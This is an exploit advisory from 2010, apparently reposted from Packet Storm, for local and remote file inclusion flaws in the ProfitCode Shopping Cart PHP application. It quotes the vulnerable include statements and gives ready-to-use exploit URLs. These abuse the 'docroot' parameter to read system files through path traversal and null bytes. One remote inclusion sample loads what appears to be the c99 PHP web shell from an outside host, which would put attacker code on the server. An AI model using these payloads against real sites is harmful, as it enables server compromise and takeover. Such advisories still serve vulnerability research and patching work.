ProfitCode Shopping Cart suffers from local file inclusion and remote file inclusion vulnerabilities.
4c6a43fb4848591f0f8df6f70517ceaaa5ab4a93275504ea30d68bba4423761f# Exploit Title: ProfitCode Shopping Cart Multi Vulnerability (LFI/RFI)
# Date: 2010-01-09
# Author: Zer0 Thunder
# Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/
# Software Link: http://sourceforge.net/project/platformdownload.php?group_id=258424
# Tested on: Windows XP sp2 [WampServer 2.0i]
- There are Cople of pages that has the LFI vuln
Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$returlvar = "dloads";
include "$docroot" . "tplates/usrauthlogin.php";
exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit :
http://localhost/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]
Sample :
http://localhost/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00
***************************************************************************************************
vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://localhost/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]
Sample
http://localhost/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00
Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://localhost/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]
Sample
http://localhost/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00
************************************************************************
- For Some resons this comeup with a RFI
Vuln c0de : dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://localhost/store/dloads/dloads-header.php?docroot=[RFI]
Sample
http://localhost/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00
########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed